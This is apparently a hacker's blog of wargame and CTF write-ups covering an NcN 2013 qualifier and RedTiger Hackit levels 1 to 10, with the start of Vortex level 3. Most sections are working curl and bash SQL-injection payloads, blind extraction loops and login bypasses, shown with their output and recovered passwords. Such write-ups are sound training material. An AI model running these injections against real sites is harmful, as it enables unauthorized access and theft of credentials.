                        level1(key,0,i+1,max,i+1);
                        free(key);
                }
        }
}
# gcc -o level_1 level_1.c
# ./level_1 62540 50
Trying key length = 32, total = 66528 and >= 62540
key     '   !    <~~~~~~~~~~~~~~~~~~~~~~~'      62540 <= (62554) <= 62554
key     '! !     <~~~~~~~~~~~~~~~~~~~~~~~'      62540 <= (62554) <= 62554
key     '  !     <~~~~~~~~~~~~~~~~~~~~~~~'      62540 <= (62553) <= 62554
key     ' "      <~~~~~~~~~~~~~~~~~~~~~~~'      62540 <= (62554) <= 62554
key     '"!      <~~~~~~~~~~~~~~~~~~~~~~~'      62540 <= (62554) <= 62554
key     '!!      <~~~~~~~~~~~~~~~~~~~~~~~'      62540 <= (62553) <= 62554
key     ' !      <~~~~~~~~~~~~~~~~~~~~~~~'      62540 <= (62552) <= 62554
key     '$       <~~~~~~~~~~~~~~~~~~~~~~~'      62540 <= (62554) <= 62554
key     '#       <~~~~~~~~~~~~~~~~~~~~~~~'      62540 <= (62553) <= 62554
key     '"       <~~~~~~~~~~~~~~~~~~~~~~~'      62540 <= (62552) <= 62554
key     '!       <~~~~~~~~~~~~~~~~~~~~~~~'      62540 <= (62551) <= 62554
key     '        <~~~~~~~~~~~~~~~~~~~~~~~'      62540 <= (62550) <= 62554
...
> simpleHash('   !    <~~~~~~~~~~~~~~~~~~~~~~~');
31217
# curl --silent --request POST --data 'password=   !    <~~~~~~~~~~~~~~~~~~~~~~~&key=62554&verification=yes31217' http://ctf.noconname.org/4cbe48a830c4cd2d4ac9e6e9373e3055/login.php
<!DOCTYPE html>
<html>
  <head>
    <title>NcN 2013 Registration Quals</title>
 </head>
<body>
<b>Congrats! you passed the level! Here is the key: 23f8d1cea8d60c5816700892284809a94bd00fe7347645b96a99559749c7b7b8</b></body>
</html>
Access Level 2

# curl --silent --output level.apk http://ctf.noconname.org/ad4d4084729af5c8faef2df8636c450e/level.apk
# unzip level.apk
# dex2jar classes.dex
# jd-gui classes_dex2jar.jar # and code review
# cd res/raw
# mv i.png qr-f.png
# mv j.png qr-e.png
# mv d.png qr-d.png
# mv h.png qr-c.png
# mv e.png qr-3.png
# mv l.png qr-2.png
# mv o.png qr-7.png
# mv n.png qr-b.png
# mv p.png qr-8.png
# mv m.png qr-1.png
# mv f.png qr-0.png
# mv c.png qr-4.png
# mv k.png qr-5.png
# mv g.png qr-6.png
# mv a.png qr-9.png
# mv b.png qr-a.png
# montage *.png -tile 4x4 -geometry +0+0 qr.png
# zbarimg --raw --quiet qr.png
788f5ff85d370646d4caa9af0a103b338dbe4c4bb9ccbd816b585c69de96d9da
Access Level 3

# curl --silent --output level.elf http://ctf.noconname.org/94999ecd63b3764ac334bcab4c4960d5/level.elf
# file level.elf
level.elf: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.24, BuildID[sha1]=0xb589d432799bf15343387fea63d4bdc00faa177c, not stripped
# chmod +x level.elf
# gdb -q level.elf
(gdb) set disassembly-flavor intel
(gdb) x/s 0x4024a8
0x4024a8:        "Type to win, only what I want to read... "
(gdb) x/25i 0x00000000004010f3
   0x4010f3 <main+212>: call   0x400fef <getch>
   0x4010f8 <main+217>: movsx  eax,al
   0x4010fb <main+220>: mov    DWORD PTR [rbp-0x4],eax
   0x4010fe <main+223>: mov    eax,DWORD PTR [rbp-0x8]
   0x401101 <main+226>: cdqe
   0x401103 <main+228>: mov    eax,DWORD PTR [rax*4+0x6033a0]
   0x40110a <main+235>: cmp    eax,DWORD PTR [rbp-0x4]
   0x40110d <main+238>: jne    0x40111e <main+255>
   0x40110f <main+240>: mov    DWORD PTR [rbp-0xc],0x1
   0x401116 <main+247>: cmp    DWORD PTR [rbp-0x4],0x51
   0x40111a <main+251>: je     0x40112d <main+270>
   0x40111c <main+253>: jmp    0x401127 <main+264>
   0x40111e <main+255>: mov    DWORD PTR [rbp-0xc],0x0
   0x401125 <main+262>: jmp    0x401154 <main+309>
   0x401127 <main+264>: cmp    DWORD PTR [rbp-0x4],0x71
   0x40112b <main+268>: jne    0x401136 <main+279>
   0x40112d <main+270>: mov    DWORD PTR [rbp-0x10],0x1
   0x401134 <main+277>: jmp    0x401154 <main+309>
   0x401136 <main+279>: mov    rax,QWORD PTR [rip+0x2022a3]        # 0x6033e0 <stdout@@GLIBC_2.2.5>
   0x40113d <main+286>: mov    rsi,rax
   0x401140 <main+289>: mov    edi,0x2a
   0x401145 <main+294>: call   0x400610 <fputc@plt>
   0x40114a <main+299>: add    DWORD PTR [rbp-0x8],0x1
   0x40114e <main+303>: cmp    DWORD PTR [rbp-0x8],0x9
   0x401152 <main+307>: jle    0x4010f3 <main+212>
(gdb) x/30s 0x6033a0
0x6033a0 <facebookctf_rocks>:    " "
0x6033a2 <facebookctf_rocks+2>:  ""
0x6033a3 <facebookctf_rocks+3>:  ""
0x6033a4 <facebookctf_rocks+4>:  "S"
0x6033a6 <facebookctf_rocks+6>:  ""
0x6033a7 <facebookctf_rocks+7>:  ""
0x6033a8 <facebookctf_rocks+8>:  "U"
0x6033aa <facebookctf_rocks+10>:         ""
0x6033ab <facebookctf_rocks+11>:         ""
0x6033ac <facebookctf_rocks+12>:         "R"
0x6033ae <facebookctf_rocks+14>:         ""
0x6033af <facebookctf_rocks+15>:         ""
0x6033b0 <facebookctf_rocks+16>:         "P"
0x6033b2 <facebookctf_rocks+18>:         ""
0x6033b3 <facebookctf_rocks+19>:         ""
0x6033b4 <facebookctf_rocks+20>:         "R"
0x6033b6 <facebookctf_rocks+22>:         ""
0x6033b7 <facebookctf_rocks+23>:         ""
0x6033b8 <facebookctf_rocks+24>:         "I"
0x6033ba <facebookctf_rocks+26>:         ""
0x6033bb <facebookctf_rocks+27>:         ""
0x6033bc <facebookctf_rocks+28>:         "S"
0x6033be <facebookctf_rocks+30>:         ""
0x6033bf <facebookctf_rocks+31>:         ""
0x6033c0 <facebookctf_rocks+32>:         "E"
0x6033c2 <facebookctf_rocks+34>:         ""
0x6033c3 <facebookctf_rocks+35>:         ""
0x6033c4 <facebookctf_rocks+36>:         "!"
0x6033c6 <facebookctf_rocks+38>:         ""
0x6033c7 <facebookctf_rocks+39>:         ""
# echo ' SURPRISE!' | ./level.elf
|  >  Type to win, only what I want to read...
|  >  **********
|
|  -> Congratulations! The key is:
|  9e0d399e83e7c50c615361506a294eca22dc49bfddd90eb7a831e90e9e1bf2fb
# gdb -q level.elf
(gdb) set disassembly-flavor intel
(gdb) break main
(gdb) run
(gdb) x/2i 0x40117b
   0x40117b <main+348>: call   0x400b38 <success>
   0x401180 <main+353>: call   0x40077c <no_me_jodas_manolo>
(gdb) set $rip = 0x40117b
(gdb) continue 
Continuing.
|
|  -> Congratulations! The key is:
|  9e0d399e83e7c50c615361506a294eca22dc49bfddd90eb7a831e90e9e1bf2fb
Posted by t0n1 0 comments
Labels: , , ,

# RedTigers Hackit wargame: Level 10 


# curl --silent --insecure --cookie-jar level10 --cookie level10 --request POST --data "password=646f6e745f7468726f775f73746f6e6573&level10login=Login" https://redtiger.dyndns.org/hackit/level10.php
                <b>Welcome to Level 10</b><br><br>
                Target: Bypass the login. Login as TheMaster<br>
                <br><br><br>
                <form method="post">
                        <input type="hidden" name='login' value="YToyOntzOjg6InVzZXJuYW1lIjtzOjY6Ik1vbmtleSI7czo4OiJwYXNzd29yZCI7czoxMjoiMDgxNXBhc3N3b3JkIjt9">
                        <input type="submit" value="Login" name="dologin">
                </form>
                <br><br><br>
# echo -n "YToyOntzOjg6InVzZXJuYW1lIjtzOjY6Ik1vbmtleSI7czo4OiJwYXNzd29yZCI7czoxMjoiMDgxNXBhc3N3b3JkIjt9" | base64 -d; echo
a:2:{s:8:"username";s:6:"Monkey";s:8:"password";s:12:"0815password";}
# echo -n 'a:2:{s:8:"username";s:9:"TheMaster";s:8:"password";b:1;}' | base64
YToyOntzOjg6InVzZXJuYW1lIjtzOjk6IlRoZU1hc3RlciI7czo4OiJwYXNzd29yZCI7YjoxO30=
# curl --silent --insecure --cookie level10 --request POST --data "login=YToyOntzOjg6InVzZXJuYW1lIjtzOjk6IlRoZU1hc3RlciI7czo4OiJwYXNzd29yZCI7YjoxO30=&dologin=Login" https://redtiger.dyndns.org/hackit/level10.php | grep is:
<br><br>The password for the hall of fame is: <b>796f75536c76645465684861636b6974477261747a</b> <br><br>
Posted by t0n1 0 comments
Labels: , , , ,

# RedTigers Hackit wargame: Level 9 


# curl --silent --insecure --cookie-jar level9 --cookie level9 --request POST --data "password=736c61705f7468655f6c616d65727a&level9login=Login" https://redtiger.dyndns.org/hackit/level9.php
                <b>Welcome to Level 9</b><br><br>
                Target: Get username and password of any user. Tablename: level9_users<br>
                Its not a blind. There is a way to get an output :) <br>
                <br><br>
        Autor: RedTiger <br>Title: Lorem ipsum <br>Lorem ipsum dolor sit amet, consetetur sadipscing elitr, sed diam nonumy eirmod tempor invidunt ut labore et dolore magna aliquyam erat, sed diam voluptua. At vero eos et accusam et justo duo dolores et ea rebum. Stet clita kasd gubergren, no sea takimata sanctus est Lorem ipsum dolor sit amet. <br><br>                     <form method="POST">
                                Name: <input type="text" name="autor"> <br>
                                Title: <input type="text" name="title"><br>
                                <textarea name="text"></textarea>
                                <input type="submit" name="post">
                        </form>
                                <br><br><br>
                        <form method="post">
                                Username: <input type="text" name="user"><br>
                                Password: <input type="text" name="password">
                                <input type="submit" name="login" value="Login">
                        </form>
                        <br>
# for i in {1..13};  do dec=`curl --silent --insecure --cookie level9 --request POST --data "autor=&title=&text='+%2b+(select+ord(right(username, $[14-$i]))+from+level9_users+limit+1)+%2b+'&post=Submit+Query" https://redtiger.dyndns.org/hackit/level9.php | grep "POST" | awk -F '<br>' '{print $7}'`; hex=`printf "%x" $dec`; echo -n `printf "\x$hex"`; done ; echo
546865426c7565466c6f776572
# for i in {1..145}; do dec=`curl --silent --insecure --cookie level9 --request POST --data "autor=&title=&text='+%2b+(select+ord(right(password,$[146-$i]))+from+level9_users+limit+1)+%2b+'&post=Submit+Query" https://redtiger.dyndns.org/hackit/level9.php | grep "POST" | awk -F '<br>' '{print $7}'`; hex=`printf "%x" $dec`; echo -n `printf "\x$hex"`; done ; echo
212f666c6f776572706f77657228293d25643436333662444644666c6c636b6668736b646668736b64666873646b6c666861736b6c6466686b6c6668726968776f7537333439353833373439353837342425c2a72526c2a72426c2a724252621c2a72425444653414446415344465344313334353334353132333472356173644651574525c2a7242644466173646661733233343536
# for i in {1..13};  do dec=`curl --silent --insecure --cookie level9 --request POST --data "autor=&title=&text='+%2b+(select+ord(right(reverse(right(reverse(username),$i)),1))+from+level9_users+limit+1)+%2b+'&post=Submit+Query" https://redtiger.dyndns.org/hackit/level9.php | grep "POST" | awk -F '<br>' '{print $7}'`; hex=`printf "%x" $dec`; echo -n `printf "\x$hex"`; done ; echo
546865426c7565466c6f776572
# for i in {1..145}; do dec=`curl --silent --insecure --cookie level9 --request POST --data "autor=&title=&text='+%2b+(select+ord(right(reverse(right(reverse(password),$i)),1))+from+level9_users+limit+1)+%2b+'&post=Submit+Query" https://redtiger.dyndns.org/hackit/level9.php | grep "POST" | awk -F '<br>' '{print $7}'`; hex=`printf "%x" $dec`; echo -n `printf "\x$hex"`; done ; echo
212f666c6f776572706f77657228293d25643436333662444644666c6c636b6668736b646668736b64666873646b6c666861736b6c6466686b6c6668726968776f7537333439353833373439353837342425c2a72526c2a72426c2a724252621c2a72425444653414446415344465344313334353334353132333472356173644651574525c2a7242644466173646661733233343536
# curl --silent --insecure --cookie level9 --request POST --data "autor=&title=&text='),((select username from level9_users limit 1),(select password from level9_users limit 1),'&post=Submit+Query" https://redtiger.dyndns.org/hackit/level9.php | sed 's/<br>/\n/g' | grep -A 1 Autor
Autor: RedTiger
Title: Lorem ipsum
--
Autor:
Title:
--
Autor: 546865426c7565466c6f776572
Title: 212f666c6f776572706f77657228293d25643436333662444644666c6c636b6668736b646668736b64666873646b6c666861736b6c6466686b6c6668726968776f7537333439353833373439353837342425c2a72526c2a72426c2a724252621c2a72425444653414446415344465344313334353334353132333472356173644651574525c2a7242644466173646661733233343536
# curl --silent --insecure --cookie level9 --request POST --data "user=546865426c7565466c6f776572&password=253231253246666c6f776572703239253344253235643436333662444644666c6c636b6668736b646668736b64666873646b6c666861736b6c6466686b6c6668726968776f753733343935383337343935383734253234253235254137253235253236254137253234253236254137253234253235253236253231254137253234253235444653414446415344465344313334353334353132333472356173644651574525323525413725323425323644466173646661733233343536&login=Login" https://redtiger.dyndns.org/hackit/level9.php | grep is:
<br>The password for the next level is: <b>646f6e745f7468726f775f73746f6e6573</b> <br><br>
Posted by t0n1 0 comments
Labels: , , , ,

# RedTigers Hackit wargame: Level 8 


# curl --silent --insecure --cookie-jar level8 --cookie level8 --request POST --data "password=4d4f4f636f774d454f57636174&level8login=Login" https://redtiger.dyndns.org/hackit/level8.php
                <b>Welcome to Level 8</b><br><br>
                Target: Get the password of the admin.<br><br><br>

                Username: Admin<br>
                <form method="POST">
                        Email: <input type="text" name="email" value="hans@localhost"> <br>
                        Name: <input type="text" name="name" value="Hans"> <br>
                        ICQ: <input type="text" name="icq" value="12345"> <br>
                        Age: <input type="text" name="age" value="25"> <br>
                        <input type="submit" name="edit" value="Edit">
                </form>
                                <br><br><br>
                        <form method="post">
                                Username: <input type="text" name="user"><br>
                                Password: <input type="text" name="password">
                                <input type="submit" name="login" value="Login">
                        </form>
                        <br>
# for i in `seq 1 20`; do email="' or length(password)='$i"; result=`curl --silent --insecure --cookie level8 --request POST --data "email=$email&edit=Edit" https://redtiger.dyndns.org/hackit/level8.php | grep email | grep 1`; if [ "$result" != "" ]; then echo $i; break; fi; done
18
# for i in `seq 1 18`; do for j in `echo {a..z} {0..9}`; do email="' or left(right(password,$[19-$i]),1)='$j"; result=`curl --silent --insecure --cookie level8 --request POST --data "email=$email&edit=Edit" https://redtiger.dyndns.org/hackit/level8.php | grep email | grep 1`; if [ "$result" != "" ]; then echo -n "$j"; break; fi; done; done; echo
7468656d65616e696e676f666c6966653432
# curl --silent --insecure --cookie level8 --request POST --data "user=Admin&password=7468656d65616e696e676f666c6966653432&login=Login" https://redtiger.dyndns.org/hackit/level8.php | grep is:
<br>The password for the next level is: <b>736c61705f7468655f6c616d65727a</b> <br><br>
Posted by t0n1 0 comments
Labels: , , , ,

# RedTigers Hackit wargame: Level 7 


# curl --silent --insecure --cookie-jar level7 --cookie level7 --request POST --data "password=646f6e745f73686f75745f61745f796f75725f6469736b73&level7login=Login" https://redtiger.dyndns.org/hackit/level7.php
                <b>Welcome to Level 7</b><br><br>
                Target: Get the name of the user who posted the news about google. Table: level7_news column: autor<br>
                Restrictions: no comments, no substr, no substring, no ascii, no mid, no like<br>
                <br><br><br> <form method="post"> <input type="text" name="search" value=""> <input type="submit" value="search!" name="dosearch"> </form> <br><br><br>
                                <br>
                        <form method="post">
                                Username: <input type="text" name="username"><br>
                                <input type="submit" name="try" value="Check!">
                        </form>
                        <br>
# for i in `seq 1 17`; do for j in `echo {A..Z} {a..z} {0..9}`; do d=`printf "%d\n" \'$j`; search="Google%' and ord(left(right(news.autor,$[18-$i]),1))=$d and '%'='"; result=`curl --silent --insecure --cookie level7 --request POST --data "search=$search&dosearch=search\!" https://redtiger.dyndns.org/hackit/level7.php | grep -v "<input" | grep Google`; if [ "$result" != "" ]; then echo -n "$j"; break; fi; done; done; echo
5465737455736572666f72673030676c65
# curl --silent --insecure --cookie level7 --request POST --data "username=5465737455736572666f72673030676c65&try=Check\!" https://redtiger.dyndns.org/hackit/level7.php | grep is:
<br>The password for the next level is: <b>4d4f4f636f774d454f57636174</b> <br><br>
Posted by t0n1 0 comments
Labels: , , , ,

# RedTigers Hackit wargame: Level 6 


# curl --silent --insecure --cookie-jar level6 --cookie level6 --request POST --data "password=6d795f6361745f736179735f6d656f776d656f77&level6login=Login" https://redtiger.dyndns.org/hackit/level6.php
                <b>Welcome to Level 6</b><br><br>
                Target: Get the first user in table level6_users with status 1<br>
                <br><br><br> <a href="?user=1">Click me</a><br><br><br>
                                <table style="border-collapse:collapse; border:1px solid black;">
                                <tr>
                                        <td>Username: </td>
                                        <td>deddlef</td>
                                </tr>
                                <tr>
                                        <td>Email: </td>
                                        <td>[email protected]</td>
                                </tr>
                        </table>

                                        <br>
                        <form method="post">
                                Username: <input type="text" name="user"><br>
                                Password: <input type="text" name="password">
                                <input type="submit" name="login" value="Login">
                        </form>
                        <br>
# for i in `seq 1 30`; do echo $i; result=`curl --silent --insecure --cookie level6 "https://redtiger.dyndns.org/hackit/level6.php?user=0%20or%20if((select%20length(password)%20from%20level6_users%20where%20id=3)=$i,true,false)" | grep deddlef`; if [ "$result" != "" ]; then break; fi; done
1
2
3
4
5
6
7
8
9
10
11
# for i in `seq 1 11`; do for j in `echo {a..z} {0..9}`; do d=` printf "%d\n" \'$j`; result=`curl --silent --insecure --cookie level6 "https://redtiger.dyndns.org/hackit/level6.php?user=0%20or%20if((select%20ord(left(right(password,$[12-$i]),1))%20from%20level6_users%20where%20id=3)=$d,true,false)" | grep deddlef`; if [ "$result" != "" ]; then echo -n "$j"; break; fi; done; done; echo
6d306e737465726b316c6c
# query2="`echo -n "' union select id,username,email,password,status from level6_users where status=1 limit 1 -- " | xxd -p | tr -d '\n'`"
# query1="`echo -n \"0 union select 1,0x$query2,3,4,5\" | sed 's/ /%20/g'`"
# curl --silent --insecure --cookie level6 "https://redtiger.dyndns.org/hackit/level6.php?user=$query1" | grep -A 1 -e ">Username" -e Email
                                        <td>Username: </td>
                                        <td>admin</td>
--
                                        <td>Email: </td>
                                        <td>6d306e737465726b316c6c</td>
# curl --silent --insecure --cookie level6 --request POST --data "user=admin&password=6d306e737465726b316c6c&login=Login" https://redtiger.dyndns.org/hackit/level6.php | grep is:
<br>The password for the next level is: <b>646f6e745f73686f75745f61745f796f75725f6469736b73</b> <br><br>
Posted by t0n1 0 comments
Labels: , , , ,

# RedTigers Hackit wargame: Level 5 


# curl --silent --insecure --cookie-jar level5 --cookie level5 --request POST --data "password=62616e616e61735f6172655f6e6f745f626c7565&level5login=Login" https://redtiger.dyndns.org/hackit/level5.php
                <b>Welcome to Level 5</b><br><br>
                Target: Bypass the login<br>
                Disabled: substring , substr, ( , ), mid<br>
                Hints: its not a blind, the password is md5-crypted, watch the login errors<br><br><br>

                        <form name="login" action="?mode=login" method="POST">
                                Username: <input name="username" size="30" type="text"><br>
                                Password: <input name="password" size="30" type="text">
                                <br>
                                <input name="login" value="Login" type="submit">
                        </form>
# password="whatever"
# echo -n $password | md5sum
008c5926ca861023c1d2a36653fd88e2  -
# username="' union select 'user','008c5926ca861023c1d2a36653fd88e2"
# curl --silent --insecure --cookie level5 --request POST --data "username=$username&password=$password&login=Login" https://redtiger.dyndns.org/hackit/level5.php?mode=login | grep is:
<br>The password for the next level is: <b>6d795f6361745f736179735f6d656f776d656f77</b> <br><br>
Posted by t0n1 0 comments
Labels: , , ,

# RedTigers Hackit wargame: Level 4 


# curl --silent --insecure --cookie-jar level4 --cookie level4 --request POST --data "password=646f6e745f7075626c6973685f736f6c7574696f6e735f41524748&level4login=Login" https://redtiger.dyndns.org/hackit/level4.php
                <b>Welcome to Level 4</b><br><br>
                Target: Get the value of the first entry in table level4_secret in column keyword<br>
                Disabled: like<br><br><br> <a href="?id=1">Click me</a><br><br><br>
        Query returned 1 rows. <br /><br />                     <br><br><br>
                        <form method="post">
                                Word: <input type="text" name="secretword"><br>
                                <input type="submit" name="go" value="Go!">
                        </form>
                        <br>
# for i in `seq 1 50`; do echo $i; result=`curl --silent --insecure --cookie level4 "https://redtiger.dyndns.org/hackit/level4.php?id=1%20and%20if((select%20length(keyword)%20from%20level4_secret)=$i,1,0)" | grep Query | awk '{print $3}'`; if [ "$result" == "1" ]; then break; fi; done
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
# for i in `seq 1 17`; do for j in `echo {a..z} {0..9}`; do result=`curl --silent --insecure --cookie level4 "https://redtiger.dyndns.org/hackit/level4.php?id=1%20and%20if((select%20substring(keyword,$i,1)%20from%20level4_secret)='$j',1,0)" | grep Query | awk '{print $3}'`; if [ "$result" == "1" ]; then echo -n "$j"; break; fi; done; done; echo
626c696e64696e6a656374696f6e313233
# curl --silent --insecure --cookie-jar level4 --cookie level4 --request POST --data 'secretword=626c696e64696e6a656374696f6e313233&go=Go!' https://redtiger.dyndns.org/hackit/level4.php | grep is:
<br>The password for the next level is: <b>62616e616e61735f6172655f6e6f745f626c7565</b> <br><br>
Posted by t0n1 0 comments
Labels: , , , ,

# RedTigers Hackit wargame: Level 3 


# curl --silent --insecure --cookie-jar level3 --cookie level3 --request POST --data "password=73656375726974796d656f775f736179735f636174&level3login=Login" https://redtiger.dyndns.org/hackit/level3.php
                <b>Welcome to Level 3</b><br> <br>
                Target: Get the password of the user Admin.<br>
                Hint: Try to get an error. Tablename: level3_users<br><br><br>

        Show userdetails: <br><a href="?usr=MTQ4MTY4MTY1MTMxMTc1MTgz">TheCow</a><br><a href="?usr=MTI5MTY0MTczMTY5MTc0">Admin</a><br>                   <br><br><br>
                        <form method="post">
                                Username: <input type="text" name="user"><br>
                                Password: <input type="text" name="password">
                                <input type="submit" name="login" value="Login">
                        </form>
                        <br>
# curl --silent --insecure --cookie level3 "https://redtiger.dyndns.org/hackit/level3.php?usr\[\]=" | grep Warning
Warning: preg_match() expects parameter 2 to be string, array given in /var/www/hackit/urlcrypt.inc on line 21
# curl --silent --insecure --output urlcrypt.inc https://redtiger.dyndns.org/hackit/urlcrypt.inc
# cat myurlcrypt.inc
#!/usr/bin/php
<?php
 function encrypt($str) {
  $cryptedstr = "";
  for ($i =0; $i < strlen($str); $i++){
   $temp = ord(substr($str,$i,1)) ^ 192;
   while(strlen($temp)<3){
    $temp = "0".$temp;
   }
   $cryptedstr .= $temp. "";
  }
  return base64_encode($cryptedstr);
 }
 echo encrypt($argv[1])."\n";
?>
# ./myurlcrypt.inc "' union select 1,2,3,4,5,6,7 -- "
MjMxMjI0MTgxMTc0MTY5MTc1MTc0MjI0MTc5MTY1MTcyMTY1MTYzMTgwMjI0MjQxMjM2MjQyMjM2MjQzMjM2MjQ0MjM2MjQ1MjM2MjQ2MjM2MjQ3MjI0MjM3MjM3MjI0
# curl --silent --insecure --cookie level3 https://redtiger.dyndns.org/hackit/level3.php?usr=MjMxMjI0MTgxMTc0MTY5MTc1MTc0MjI0MTc5MTY1MTcyMTY1MTYzMTgwMjI0MjQxMjM2MjQyMjM2MjQzMjM2MjQ0MjM2MjQ1MjM2MjQ2MjM2MjQ3MjI0MjM3MjM3MjI0
                <b>Welcome to Level 3</b><br> <br>
                Target: Get the password of the user Admin.<br>
                Hint: Try to get an error. Tablename: level3_users<br><br><br>

        Show userdetails: <br>                          <table style="border-collapse:collapse; border:1px solid black;">
                                        <tr>
                                                <td>Username: </td>
                                                <td>2</td>
                                        </tr>
                                        <tr>
                                                <td>First name: </td>
                                                <td>6</td>
                                        </tr>
                                        <tr>
                                                <td>Name: </td>
                                                <td>7</td>
                                        </tr>
                                        <tr>
                                                <td>ICQ: </td>
                                                <td>5</td>
                                        </tr>
                                        <tr>
                                                <td>Email: </td>
                                                <td>4</td>
                                        </tr>
                                </table>

                                                <br><br><br>
                        <form method="post">
                                Username: <input type="text" name="user"><br>
                                Password: <input type="text" name="password">
                                <input type="submit" name="login" value="Login">
                        </form>
                        <br>
# ./myurlcrypt.inc "' union select 1,2,3,password,username,6,7 from level3_users where username='Admin' -- "
MjMxMjI0MTgxMTc0MTY5MTc1MTc0MjI0MTc5MTY1MTcyMTY1MTYzMTgwMjI0MjQxMjM2MjQyMjM2MjQzMjM2MTc2MTYxMTc5MTc5MTgzMTc1MTc4MTY0MjM2MTgxMTc5MTY1MTc4MTc0MTYxMTczMTY1MjM2MjQ2MjM2MjQ3MjI0MTY2MTc4MTc1MTczMjI0MTcyMTY1MTgyMTY1MTcyMjQzMTU5MTgxMTc5MTY1MTc4MTc5MjI0MTgzMTY4MTY1MTc4MTY1MjI0MTgxMTc5MTY1MTc4MTc0MTYxMTczMTY1MjUzMjMxMTI5MTY0MTczMTY5MTc0MjMxMjI0MjM3MjM3MjI0
# curl --silent --insecure --cookie level3 https://redtiger.dyndns.org/hackit/level3.php?usr=MjMxMjI0MTgxMTc0MTY5MTc1MTc0MjI0MTc5MTY1MTcyMTY1MTYzMTgwMjI0MjQxMjM2MjQyMjM2MjQzMjM2MTc2MTYxMTc5MTc5MTgzMTc1MTc4MTY0MjM2MTgxMTc5MTY1MTc4MTc0MTYxMTczMTY1MjM2MjQ2MjM2MjQ3MjI0MTY2MTc4MTc1MTczMjI0MTcyMTY1MTgyMTY1MTcyMjQzMTU5MTgxMTc5MTY1MTc4MTc5MjI0MTgzMTY4MTY1MTc4MTY1MjI0MTgxMTc5MTY1MTc4MTc0MTYxMTczMTY1MjUzMjMxMTI5MTY0MTczMTY5MTc0MjMxMjI0MjM3MjM3MjI0 | grep -A 1 -e ICQ -e Email
                                                <td>ICQ: </td>
                                                <td>Admin</td>
--
                                                <td>Email: </td>
                                                <td>746869736973617665727973656375726570617373776f7264454545357274</td>
# curl --silent --insecure --cookie level3 --request POST --data "user=Admin&password=746869736973617665727973656375726570617373776f7264454545357274&login=Login" https://redtiger.dyndns.org/hackit/level3.php | grep is:
<br>The password for the next level is: <b>646f6e745f7075626c6973685f736f6c7574696f6e735f41524748</b> <br><br>
Posted by t0n1 0 comments
Labels: , , ,

# RedTigers Hackit wargame: Level 2 


# curl --silent --insecure --cookie-jar level2 --cookie level2 --request POST --data "password=656173796c6576656c7361726565617379&level2login=Login" https://redtiger.dyndns.org/hackit/level2.php
<b>Welcome to level 2</b>
<br><br>
A simple loginbypass
<br><br>
Target: Login
<br>
Hint: Condition
<br><br><br>

<form method="POST">
        Username: <input type="text" name="username"><br>
        Password: <input type="password" name="password"><br>
        <input type="submit" name="login" value="Login">
</form>
# curl --silent --insecure --cookie level2 --request POST --data "username=' or 'u'='u&password=' or 'p'='p&login=Login" https://redtiger.dyndns.org/hackit/level2.php | grep is:
<br>The password for the next level is: <b>73656375726974796d656f775f736179735f636174</b> <br><br>
Posted by t0n1 0 comments
Labels: , , ,

# RedTigers Hackit wargame: Level 1 


# curl --silent --insecure https://redtiger.dyndns.org/hackit/level1.php
<b>Welcome to level 1</b>
<br><br>
Lets start with a simple injection.
<br><br>
Target: Get the login for the user Hornoxe
<br>
Hint: You really need one? omg -_-
<br>
Tablename: level1_users
<br><br><br>


<br>Category: <a href="?cat=1">1</a><br><br>This category does not exist! <br>                  <br><br><br>
                        <form method="post">
                                Username: <input type="text" name="user"><br>
                                Password: <input type="text" name="password">
                                <input type="submit" name="login" value="Login">
                        </form>
                        <br>
# curl --silent --insecure "https://redtiger.dyndns.org/hackit/level1.php?cat=1%20union%20select%201,2,username,password%20from%20level1_users" | grep ">Hornoxe" | awk -F "<br>" '{print $4}'
7468617477617365617379
# curl --silent --insecure --request POST --data "user=Hornoxe&password=7468617477617365617379&login=Login" https://redtiger.dyndns.org/hackit/level1.php | grep is:
<br>The password for the next level is: <b>656173796c6576656c7361726565617379</b> <br><br>
Posted by t0n1 0 comments
Labels: , , ,

# Vortex wargame: Level 3 


# ssh [email protected]
[email protected]'s password:36346e635854767823

$ file /vortex/vortex3
/vortex/vortex3: setuid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.24, BuildID[sha1]=0xfa95ff349b30e694b0106281d5c79e2b1ab997c2, not stripped
$ objdump --section=.plt --disassemble-all /vortex/vortex3 | grep -A 3 exit
08048320 <exit@plt>:
 8048320:       ff 25 38 97 04 08       jmp    *0x8049738
 8048326:       68 10 00 00 00          push   $0x10
 804832b:       e9 c0 ff ff ff          jmp    80482f0 <_init+0x3c>
$ readelf --sections /vortex/vortex3 | grep "\["
  [Nr] Name              Type            Addr     Off    Size   ES Flg Lk Inf Al
  [ 0]                   NULL            00000000 000000 000000 00      0   0  0
